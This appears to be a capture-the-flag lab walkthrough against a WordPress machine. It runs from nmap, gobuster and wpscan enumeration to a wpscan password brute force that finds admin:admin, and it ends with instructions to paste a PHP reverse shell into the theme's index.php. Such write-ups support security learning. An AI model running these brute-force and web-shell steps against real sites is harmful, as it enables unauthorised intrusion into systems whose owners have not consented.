PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.158
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| 256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
|_ 256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Seems like there is another WordPress website, Medium already got 4 WordPress machine
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u <http://192.168.158.50/> -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 298]
/.hta (Status: 403) [Size: 293]
/index.html (Status: 200) [Size: 81]
/javascript (Status: 301) [Size: 321] [--> <http://192.168.158.50/javascript/>]
/LICENSE (Status: 200) [Size: 1672]
/robots.txt (Status: 200) [Size: 1451]
/server-status (Status: 403) [Size: 302]
/upload (Status: 301) [Size: 317] [--> <http://192.168.158.50/upload/>]
/wordpress (Status: 301) [Size: 320] [--> <http://192.168.158.50/wordpress/>]
Also it seems like there is some SQL database info leaked on /upload
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://192.168.158.50/wordpress/>
_______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://192.168.158.50/wordpress/> [192.168.158.50]
[+] Started: Sat Jul 16 08:37:53 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://192.168.158.50/wordpress/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://192.168.158.50/wordpress/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://192.168.158.50/wordpress/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
| Found By: Rss Generator (Passive Detection)
| - <http://192.168.158.50/wordpress/?feed=rss2>, <generator><http://wordpress.org/?v=3.9.14></generator>
| - <http://192.168.158.50/wordpress/?feed=comments-rss2>, <generator><http://wordpress.org/?v=3.9.14></generator>
[+] WordPress theme in use: twentyfourteen
| Location: <http://192.168.158.50/wordpress/wp-content/themes/twentyfourteen/>
| Latest Version: 3.4
| Last Updated: 2022-05-24T00:00:00.000Z
| Style URL: <http://192.168.158.50/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| The version could not be determined.
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: <http://192.168.158.50/wordpress/wp-content/plugins/mail-masta/>
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.158.50/wordpress/wp-content/plugins/mail-masta/readme.txt>
Continue to enumerate users
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://192.168.158.50/wordpress/> --enumerate u
<...SNIPPET...>
[i] User(s) Identified:
[+] btrisk
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
As expected, plugin mail-masta 1.0 has LFI
From both username from wpscan and LFI we know there is a user btrisk
However after so much wpscan bruteforce we end up the with credential admin:admin
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url <http://192.168.158.50/wordpress/> -U admin -P /usr/share/wordlists/rockyou.txt
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - admin / admin
All Found
Progress Time: 00:00:57 < > (40 / 28688) 0.13% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: admin
Let’s login at /wordpress/wp-admin/
Then we can go to Appearance > Editor tab and we can do some code edit
We will be looking for Main Index Template (index.php) to avoid headache, and then paste the php-reverse-shell.php into it so we can easily visit /wordpress/index.php